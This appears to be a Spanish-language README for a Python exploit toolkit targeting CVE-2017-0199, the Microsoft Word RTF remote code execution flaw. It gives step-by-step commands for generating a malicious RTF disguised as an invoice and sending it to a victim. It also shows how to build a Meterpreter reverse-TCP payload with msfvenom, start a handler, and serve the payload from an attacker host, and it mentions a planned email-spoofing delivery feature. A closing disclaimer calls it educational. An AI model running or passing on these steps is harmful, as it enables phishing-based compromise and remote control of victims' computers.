
El Exploit toolkit CVE-2017-0199 - v2.0 es un práctico script de Python que ofrece una forma rápida y eficaz de explotar Microsoft RTF RCE. Puede generar un archivo RTF malicioso y entregar metasploit / meterpreter / cualquier otro payload a la víctima sin necesidad de configuración compleja.
Exploit toolkit CVE-2017-0199 - v2.0 es un práctico script de Python que proporciona una forma rápida y eficaz de explotar Microsoft RTF RCE. Puede generar un archivo RTF malicioso y entregar el payload de metasploit / meterpreter a la víctima sin ninguna configuración compleja.
Se incorporaron las siguientes capacidades al script
- Generar un archivo RTF malicioso usando el toolkit
- Ejecutar el toolkit en modo explotación como un pequeño HTA + servidor web
Versión: Python 2.7.13
Se está trabajando en la siguiente funcionalidad
- Enviar automáticamente el RTF malicioso generado a la víctima mediante suplantación de correo electrónico
Paso 1: Generar un archivo RTF malicioso usando el siguiente comando y enviarlo a la víctima
Sintaxis:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Ejemplo:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
Paso 2 (Opcional, si se usa MSF Payload): Generar el payload de metasploit e iniciar el handler
Ejemplo:
Generar payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Iniciar handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Paso 3: Iniciar el toolkit en modo explotación para entregar los payloads
Sintaxis:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Ejemplo:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
Este programa es SOLO para fines educativos. No lo use sin permiso. Se aplica el descargo de responsabilidad habitual, especialmente el hecho de que yo (bhdresh) no soy responsable de los daños causados por el uso directo o indirecto de la información o la funcionalidad proporcionada por estos programas. El autor o cualquier proveedor de Internet NO asume responsabilidad alguna por el contenido o el mal uso de estos programas o de cualquier derivado de los mismos. Al usar este programa, usted acepta que cualquier daño (pérdida de datos, caída del sistema, compromiso del sistema, etc.) causado por el uso de estos programas no es responsabilidad de bhdresh.
@nixawk por la muestra RTF, @bhdresh
Obviamente, no soy un desarrollador a tiempo completo, así que espera algunos contratiempos
Por favor, reporta errores e incidencias a [email protected]